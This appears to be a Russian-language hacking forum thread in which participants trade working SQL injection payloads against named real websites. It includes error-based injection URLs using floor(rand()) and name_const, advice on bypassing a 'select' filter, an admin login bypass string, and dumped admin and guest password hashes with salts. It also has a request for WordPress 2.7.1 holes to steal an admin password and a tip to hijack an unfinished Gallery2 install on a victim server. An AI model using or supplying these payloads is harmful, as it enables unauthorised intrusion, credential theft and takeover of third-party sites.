народ прошу помоши в раскрутке через floor rand вот версию и др инфо выводится норм но вот никак не могу выводит именя таблиц и колонок. _http://www.le ve lst oc k.com/mod/emarket/index.php?page=2&sort=1%20and%20row(1,1)%3E(select%20count(*),concat(version(),0x3a,floor(rand()*2))x%20from%20(select%201%20union%20select%202)a%20group%20by%20x%20limit%201)-- _http://www.le ve ls to ck.com/mod/emarket/index.php?page=2&sort=1%20and%20row(1,1)%3E(select%20count(*),concat(database(),0x3a,floor(rand()*2))x%20from%20(select%201%20union%20select%202)a%20group%20by%20x%20limit%201)-- может кто посоветует с правильным запросом для таблиц и колонок. Тут как только добавляю про information_schema.tables сразу ругается
ну знаю что может быть фильтрация но я основном мучаюс что не могу составит правильный запрос с таким типам скуля. Ну стандартные вроде знаю но тут метод Qwazar как то не очень то гоняю. Попробовал через toolza там тоже не пашет
ну могыт так: selselectect )) хз Мужики))хдд http://www.bilandima.ru/html/promofoto.php?p=156_anasteshiya' ДИМА БИЛАН))хы
http://www.keyin.ca/news.asp?id=52&news=showall может найдется чувак который обойдет фильтр на select
http://www.keyin.ca/admin/default.asp в поле логин admin' or (1,2)=(select * from (select name_const(version(),1),name_const(version(),1))x)--
это хорошо..=) но надо select обойти... меня не интересует админский доступ очень интересует именно обход фильтра на select
Крутите так, какая разница нах... Какой обход. ' and (select 1 from (select count(0),concat(database(),':',user(),floor(rand(0)*2)) from (select 1 union select 2 union select 3)x group by 2)a)# ps file_priv у юзера нет!
hahhaha т.е. какой нахер админский доступ, я имелл ввиду не уязвимость в другом параметре а именно обход фильтрации select в параметре id http://www.keyin.ca/news.asp?id=52&news=showall
WordPress 2.7.1 Имею ввиду уязвимость, позволяющая узнать пароль админа, сбросить его себе на ящик, подменить исполняемый код, SQL инъекция, узнать e-mail администратора? Условие - регистрация закрыта, постинг запрещён, для рядового пользователя разрешены только комментарии.
На этом сайте достал такие hash http://slr-zone.com/lens/lens1.php?id=509+union+select+concat_ws(0x3a,g_userName,g_hashedPassword)+from+g2_User+--+ guest:LajD09f455fd66378f12280bfd7894ce5b46 admin:kNaScfa395e30ad8195a4975c91eee51f33c подбор 09f455fd66378f12280bfd7894ce5b46:LajD В админку попасть не удается http://slr-zone.com/shop/ Что можете еще посоветовать? Заранее всем спасибо!
esli tebya mysql version() toqda.. http://www.levelstock.com/mod/emarket/index.php?page=2&sort=(select*from(select+name_const(version(),1),name_const(version(),1))a)
прозреваю, что это хеши от старой инсталляции gallery2, которая лежит в какой-то папке на серве. http://slr-zone.com/shop/ - это неустановленная gallery2, можешь завершить инсталляцию, вписав свои данные и там видно будет.
есть) хекеры там типо: Code: http://www.hack0wn.com/view.php?xroot=271.0+and+(select+1+from+(select+count(0),concat((select+version()),floor(rand(0)*2))+from+information_schema.tables+group+by+2+limit+1)a)--+&cat=exploits
а так такую уязвимость через тулзу раскрутить ? сам пытался, но ни через $source_sql ни через $f_url ни в [11] Mysql inj NAME_CONST ни в [12] Mysql inj floor(rand()) подобрать правильный вариант не получилось